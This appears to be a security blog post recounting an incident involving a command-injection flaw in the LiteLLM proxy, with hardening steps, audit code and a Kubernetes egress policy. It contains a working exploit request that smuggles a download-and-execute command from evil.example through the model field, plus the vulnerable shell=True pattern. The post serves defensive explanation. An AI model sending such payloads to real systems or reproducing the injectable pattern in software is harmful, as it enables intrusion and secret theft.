3 Critical LiteLLM Flaws You Must Know Now
TL;DR – Our incident response team lived this nightmare last week.
- CVE-2026-42271 lets an unauthenticated attacker execute arbitrary code on a LiteLLM proxy server through a poisoned model parameter.
- The chain is trivial: a single curl command, no API key, and you get a reverse shell inside the Kubernetes pod.
- We’ll walk through the underlying command injection, the misconfigured YAML that enabled it, and the exact network policy that slammed the door shut.
I was knee‑deep in audit logs at 2 a.m. when I saw it. A freshly‑spawned container in our ai‑gateway namespace had an outbound connection to a known C2 IP. The pod ran litellm – the Open Source proxy that unifies 100+ LLM APIs. We hadn’t touched that deployment in two weeks. Yet somehow, an attacker was sitting on a shell inside our cluster.
It didn’t take long to trace the kill chain back to CVE-2026-42271, an ugly command injection inside LiteLLM’s model resolution logic. The exploit needs no authentication, and chaining it to a kubectl exec-style breakout yields full node RCE. Here’s exactly how it works, and the three flaws you need to fix right now.
What LiteLLM Forgot to Sanitize
LiteLLM proxies requests to backend LLM providers. When you send a /chat/completions request, the proxy reads the model field to decide which provider to call. Under the hood, LiteLLM uses Python’s subprocess to launch a lightweight provider‑specific router – and that’s where the rot settled.
The vulnerable code path (simplified) looked like this:
    provider_router = f"litellm-router --model {model_string}"
    subprocess.Popen(provider_router, shell=True)
See the problem? The model_string is taken straight from the user’s JSON body. No shlex.quote(), no allow‑list. With shell=True, an attacker can chain commands using backticks, semicolons, or $(). The only hurdle is that LiteLLM’s default Docker image runs as a non‑root user – but in a typical Kubernetes deployment, you just need a writable /tmp and a misconfigured service account to pivot.
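To make the missing shlex.quote() concrete, here is a minimal sketch using only Python's standard library. It reuses the payload from the exploit request in this post and the simplified litellm-router command line shown above; nothing is executed, and shlex.split is only an approximation of how a POSIX shell splits words.

```python
import shlex

# Payload from the exploit request in this post.
payload = (
    "gpt-3.5-turbo; curl -o /tmp/sh https://evil.example/bins/sh; "
    "chmod +x /tmp/sh; /tmp/sh"
)

# Vulnerable pattern: the payload is spliced into the command line as-is,
# so a shell would treat every ';' as a command separator.
unsafe_cmd = f"litellm-router --model {payload}"

# Quoted pattern: shlex.quote wraps the value so a POSIX shell sees one word.
quoted_cmd = f"litellm-router --model {shlex.quote(payload)}"

# shlex.split approximates shell word splitting without running anything.
unsafe_words = shlex.split(unsafe_cmd)
quoted_words = shlex.split(quoted_cmd)

print(len(unsafe_words))  # many words: the payload leaks into the command line
print(quoted_words)       # exactly three words, the payload kept as one argument
```

Quoting is the weaker of the two defenses. Passing an argument list with shell=False avoids the shell entirely, so there is nothing to escape in the first place.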
The exploit request is embarrassingly simple:
    curl -X POST http://litellm-proxy:4000/v1/chat/completions \
      -H "Content-Type: application/json" \
      -d '{
        "model": "gpt-3.5-turbo; curl -o /tmp/sh https://evil.example/bins/sh; chmod +x /tmp/sh; /tmp/sh",
        "messages": [{"role": "user", "content": "hi"}]
      }'
No Authorization header. No API token. That single HTTP call pops a connect‑back shell.
We confirmed it in our staging cluster. Within 90 seconds, the attacker had enumerated Kubernetes secrets via the pod’s service account and was attempting to reach the metadata endpoint. A lateral‑move waiting to happen.
The Three Flaws That Formed a Perfect Storm
1. Command Injection in model Resolution (CVE-2026-42271)
This is the root cause. The model field passes unchecked into a shell context, so any metacharacter the shell interprets (a backtick, ;, |, or $()) triggers execution. Proxy versions 0.12.8 and earlier are affected; the litellm PyPI package is also vulnerable if you’re running it outside the official containers.
💡 Pro Tip: If you can’t update immediately, add a Lua filter in your ingress controller to reject any model containing a shell metacharacter. It’s a flimsy band‑aid, but it slows down script kiddies.
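The tip above talks about a Lua filter; the same check is sketched here in Python so the logic is easy to read and test. The function name, the metacharacter set, and the choice to reject bodies without a string model field are all assumptions for illustration, not part of any ingress controller or of LiteLLM.

```python
import json

# Characters a POSIX shell treats specially. This set is an assumption for
# illustration, not an official or exhaustive list.
SHELL_METACHARS = set(";|&$`<>(){}\\\n\"'")


def should_reject(raw_body: bytes) -> bool:
    """Return True if a chat completion request should be dropped at the edge."""
    try:
        body = json.loads(raw_body)
    except ValueError:
        # Covers malformed JSON and undecodable bytes.
        return True
    model = body.get("model") if isinstance(body, dict) else None
    if not isinstance(model, str):
        # Assumption: every request on this route must carry a string model.
        return True
    return any(ch in SHELL_METACHARS for ch in model)


print(should_reject(b'{"model": "gpt-3.5-turbo"}'))
print(should_reject(b'{"model": "gpt-3.5-turbo; id"}'))
```

A deny-list like this only catches the characters you thought of, which is why it stays a band-aid until the upgrade lands.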
2. Overly Permissive securityContext in Kubernetes Manifests
Most tutorials – including the one we followed – deployed LiteLLM with allowPrivilegeEscalation: true and no seccompProfile. The attacker couldn’t install kernel modules, but they could load libc‑based exploits to break out of the container namespace, especially on hosts with outdated kernels.
Our production pod spec, before the incident, looked like this:
    apiVersion: v1
    kind: Pod
    metadata:
      name: litellm-proxy
      labels:
        app: litellm
    spec:
      containers:
        - name: proxy
          image: ghcr.io/berriai/litellm:main
          securityContext:
            allowPrivilegeEscalation: true  # <-- facepalm
            capabilities:
              add:
                - NET_RAW  # why?
That NET_RAW capability is a gift – it lets a reverse shell craft raw packets, bypassing container network restrictions.
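A quick way to catch a spec like ours before it ships is a small lint over the container's securityContext. The sketch below is a hypothetical helper (audit_container is our name, not a Kubernetes API) that works on an already-parsed manifest as a plain dict. It only looks at container-level settings, so a seccompProfile set at pod level would still be reported as missing.

```python
def audit_container(container: dict) -> list[str]:
    """Return human-readable findings for one container spec."""
    findings = []
    ctx = container.get("securityContext") or {}

    # Flag anything other than an explicit false.
    if ctx.get("allowPrivilegeEscalation") is not False:
        findings.append("allowPrivilegeEscalation is not explicitly false")

    caps = ctx.get("capabilities") or {}
    added = caps.get("add") or []
    if added:
        findings.append("capabilities added: " + ", ".join(added))
    if "ALL" not in (caps.get("drop") or []):
        findings.append("capabilities.drop does not include ALL")

    if not ctx.get("seccompProfile"):
        findings.append("no container-level seccompProfile")
    if ctx.get("readOnlyRootFilesystem") is not True:
        findings.append("readOnlyRootFilesystem is not true")
    return findings


# The container from our pre-incident pod spec, as a parsed dict.
incident_container = {
    "name": "proxy",
    "image": "ghcr.io/berriai/litellm:main",
    "securityContext": {
        "allowPrivilegeEscalation": True,
        "capabilities": {"add": ["NET_RAW"]},
    },
}

for finding in audit_container(incident_container):
    print(finding)
```

Run against the incident container, every one of the five checks fires, which is roughly how the post-mortem felt.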
3. Egress Allowed to All External IPs
Our NetworkPolicy was wide open. The pod could reach any IP on port 443. So when the reverse shell dialed out, there was nothing blocking it. The attacker chose a free‑tier CDN domain to exfiltrate secrets, making detection even harder.
How We Automated a Fix in 30 Minutes
We didn’t wait for the next patch cycle. Here’s the exact playbook:
Step 1: Upgraded LiteLLM to v1.8.2+, where model is parsed through a strict allow-list and all subprocess calls use shell=False with explicit argument vectors.
Step 2: Hardened the pod security context: no privilege escalation, a read-only root filesystem, all capabilities dropped, and a seccomp profile that allows only the syscalls LiteLLM actually needs.
Step 3: Deployed a NetworkPolicy that restricts egress to only the LLM provider IPs we need (OpenAI’s API, Anthropic, etc.).
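The pattern behind Step 1, an allow-list plus an explicit argument vector, can be sketched in a few lines. This is not the patched LiteLLM code. ALLOWED_MODELS and build_router_argv are hypothetical names, the model list is a placeholder, and litellm-router is the simplified command from the vulnerable snippet earlier in this post.

```python
# Hypothetical allow-list; in a real deployment this would come from config.
ALLOWED_MODELS = frozenset({"gpt-3.5-turbo", "gpt-4o", "claude-3-5-sonnet"})


def build_router_argv(model: str) -> list[str]:
    """Validate the model name and return an argument vector for subprocess."""
    if model not in ALLOWED_MODELS:
        raise ValueError(f"model not in allow-list: {model!r}")
    # Each list element reaches the child process as exactly one argument,
    # so no shell ever parses the model string.
    return ["litellm-router", "--model", model]


argv = build_router_argv("gpt-3.5-turbo")
print(argv)

# The argv would then be handed to subprocess without a shell, e.g.:
#   subprocess.run(argv, shell=False, check=True)
```

Exact-match validation is deliberately dumb: the exploit payload fails the membership test long before any process is spawned.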
Here’s the YAML for the egress‑only policy that saved our weekend (replace the IPs with the actual ranges of your providers):
    apiVersion: networking.k8s.io/v1
    kind: NetworkPolicy
    metadata:
      name: litellm-egress-restrict
      namespace: ai-gateway
    spec:
      podSelector:
        matchLabels:
          app: litellm
      policyTypes:
        - Egress
      egress:
        # Allow DNS resolution
        - to:
            - namespaceSelector:
                matchLabels:
                  name: kube-system
          ports:
            - protocol: UDP
              port: 53
        # Allow HTTPS to known LLM API endpoints only
        - to:
            - ipBlock:
                cidr: 20.190.136.16/32  # Example: OpenAI API
            - ipBlock:
                cidr: 35.186.224.0/20  # Example: Anthropic
          ports:
            - protocol: TCP
              port: 443
        # Deny everything else (default deny is in effect)
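Before applying a policy like this, it helps to sanity-check which destinations the CIDR list really covers. The sketch below models only the HTTPS rule, using Python's ipaddress module and the example CIDRs from the policy. egress_allowed is a hypothetical helper, and actual enforcement is up to your CNI plugin, not this code.

```python
import ipaddress

# Example CIDRs copied from the policy above; replace with your providers' ranges.
ALLOWED_EGRESS_CIDRS = ["20.190.136.16/32", "35.186.224.0/20"]
ALLOWED_PORT = 443


def egress_allowed(dest_ip: str, port: int) -> bool:
    """Model the HTTPS egress rule: TCP 443 to an allow-listed CIDR only."""
    if port != ALLOWED_PORT:
        return False
    addr = ipaddress.ip_address(dest_ip)
    return any(
        addr in ipaddress.ip_network(cidr) for cidr in ALLOWED_EGRESS_CIDRS
    )


print(egress_allowed("35.186.239.255", 443))  # last address inside the /20
print(egress_allowed("35.186.240.1", 443))    # first block outside the /20
```

Checking the edges of each range this way is a cheap guard against an off-by-one prefix length that silently allows more than you meant.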
💡 Pro Tip: Use a CiliumNetworkPolicy with FQDN filtering if you can’t pin down IP ranges. It’s way more maintainable and blocks DNS rebinding tricks.
If you’re interested in more detailed technical analysis, check out the vulnerability details explained here. While you’re at it, grab the hardened manifests from our Kubernetes security lab. We’ve open‑sourced the seccomp profiles and the egress allow‑list generator.
The Real Lesson: AI Gateways Are Your New Perimeter
LiteLLM isn’t a simple sidecar; it’s a full-fledged proxy that bridges your internal network to external AI providers. It handles raw user input, and if you don’t treat it as a trust boundary, you’re already compromised. In our case, the fix wasn’t just patching a CVE. It was accepting that every field in an AI chat request is potentially tainted.
We now fuzz all model strings in CI/CD with radamsa and enforce a strict mutation rejection policy. We also dropped the --model command flag in our custom router fork – the model is parsed inside Python, validated against a YAML schema, and only then passed to a provider interface.
Attackers are not experimenting anymore. They’re actively searching for unsecured AI endpoints because the reward – LLM access keys, internal API tokens, and a high‑privileged Kubernetes context – is massive. Don’t be the next headline. Patch, lock down egress, and audit every shell=True in your stack.
